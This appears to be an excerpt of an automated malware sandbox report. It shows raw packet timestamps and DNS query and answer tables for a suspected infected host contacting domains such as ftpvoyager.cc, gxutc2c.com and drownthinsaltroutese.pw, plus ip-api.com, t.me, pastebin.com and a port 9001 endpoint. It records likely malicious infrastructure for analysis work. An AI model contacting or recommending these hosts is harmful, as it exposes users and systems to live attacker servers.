                                                                                                                                                                    Jan 7, 2024 05:30:14.210764885 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.254954100 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.255026102 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.255038977 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.255135059 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.255182981 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.255238056 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.255332947 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.255727053 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.294573069 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.294650078 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.294718981 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.294800043 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.294802904 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.294816971 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.294868946 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.309895039 CET497769001192.168.2.4178.17.170.13
                                                                                                                                                                    Jan 7, 2024 05:30:14.317838907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.317924976 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:14.340908051 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.340992928 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.341042042 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.341135025 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.341233969 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.341276884 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.341331005 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.341331005 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.341414928 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.341460943 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.341504097 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.341530085 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.384586096 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.384644985 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.384777069 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.384851933 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.384967089 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.384984016 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.385036945 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.387845993 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.430672884 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.430754900 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.430838108 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.430883884 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.430932045 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.430946112 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.430979013 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.471880913 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.471936941 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.471985102 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.472088099 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.472661018 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.472712994 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.472735882 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.472749949 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.472763062 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.472805023 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.473045111 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.511662960 CET900149776178.17.170.13192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.516419888 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.516652107 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.516716957 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.517220974 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.517265081 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.517445087 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.517466068 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.517472982 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.517508030 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.517868996 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.517916918 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.517929077 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.518235922 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.558248043 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.558312893 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.558315039 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.558406115 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.558451891 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.558517933 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.558608055 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.558727026 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.599932909 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.600064993 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.600094080 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.600128889 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.604264021 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.604341030 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.604367971 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.604393005 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.604435921 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.604526997 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.604644060 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.604686022 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.604711056 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.604902983 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.604943037 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.647541046 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.647634983 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.647730112 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.647743940 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.647777081 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.647798061 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.690692902 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.691234112 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.691299915 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.691404104 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.691504955 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.691597939 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.694010019 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.694125891 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.694174051 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.694217920 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.694262028 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.694308996 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.694351912 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.694443941 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.694506884 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.694561005 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.736378908 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.736398935 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.736496925 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.736556053 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.736591101 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.736699104 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.736716032 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.736768007 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.870268106 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870309114 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870326996 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870373964 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870407104 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870405912 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.870421886 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870440960 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870446920 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.870465040 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.870769024 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870791912 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870820045 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.870913982 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870932102 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.870975018 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.870994091 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.871020079 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.871053934 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.871057034 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.871140003 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.871687889 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.871747971 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.871762037 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.871882915 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.914895058 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.914942980 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.914985895 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.915066004 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.915101051 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.915118933 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.915148020 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.915150881 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.915174007 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.958302021 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.958357096 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.958390951 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.958425999 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.958494902 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.958539963 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:14.958544016 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:14.958633900 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.001759052 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.001797915 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.001869917 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.001869917 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.001957893 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.002022028 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.002074003 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.002093077 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.002156973 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.046926022 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.046941996 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.047055006 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.047054052 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.047152042 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.047286987 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.047348976 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.047379017 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.047434092 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.047519922 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.089703083 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.089730978 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.089783907 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.089813948 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.089942932 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.089987993 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.090034008 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.090117931 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.106767893 CET497769001192.168.2.4178.17.170.13
                                                                                                                                                                    Jan 7, 2024 05:30:15.134320974 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.134392977 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.134406090 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.134501934 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.176847935 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.176922083 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.177089930 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.177180052 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.177229881 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.178267956 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.178381920 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.178426981 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:15.178472042 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:15.178499937 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Jan 7, 2024 05:29:18.125936031 CET192.168.2.41.1.1.10x85bStandard query (0)selebration17io.ioA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:29:31.964270115 CET192.168.2.41.1.1.10x4cb0Standard query (0)DNnWlzGnswsDCQNCmwABsgDqpMuf.DNnWlzGnswsDCQNCmwABsgDqpMufA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:29:48.896272898 CET192.168.2.41.1.1.10xd0ceStandard query (0)drownthinsaltroutese.pwA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:02.187530994 CET192.168.2.41.1.1.10x8fa3Standard query (0)ftpvoyager.ccA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:03.200637102 CET192.168.2.41.1.1.10x8fa3Standard query (0)ftpvoyager.ccA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.202836990 CET192.168.2.41.1.1.10x8fa3Standard query (0)ftpvoyager.ccA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:07.836409092 CET192.168.2.41.1.1.10xef2eStandard query (0)hugo.topteamlife.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:29.066389084 CET192.168.2.41.1.1.10xc206Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:33.530771017 CET192.168.2.41.1.1.10xb9e3Standard query (0)gxutc2c.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:34.558058977 CET192.168.2.41.1.1.10xb9e3Standard query (0)gxutc2c.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:34.866024017 CET192.168.2.41.1.1.10x2b2eStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.618031979 CET192.168.2.41.1.1.10xb9e3Standard query (0)gxutc2c.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:38.401469946 CET192.168.2.41.1.1.10x52c5Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Jan 7, 2024 05:29:18.295159101 CET1.1.1.1192.168.2.40x85bNo error (0)selebration17io.io91.215.85.120A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:29:32.060312986 CET1.1.1.1192.168.2.40x4cb0Name error (3)DNnWlzGnswsDCQNCmwABsgDqpMuf.DNnWlzGnswsDCQNCmwABsgDqpMufnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:29:48.999069929 CET1.1.1.1192.168.2.40xd0ceNo error (0)drownthinsaltroutese.pw172.67.131.114A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:29:48.999069929 CET1.1.1.1192.168.2.40xd0ceNo error (0)drownthinsaltroutese.pw104.21.4.10A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc201.119.33.19A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572002888 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc201.119.33.19A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572021961 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc201.119.33.19A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:04.572045088 CET1.1.1.1192.168.2.40x8fa3No error (0)ftpvoyager.cc175.120.254.9A (IP address)IN (0x0001)false
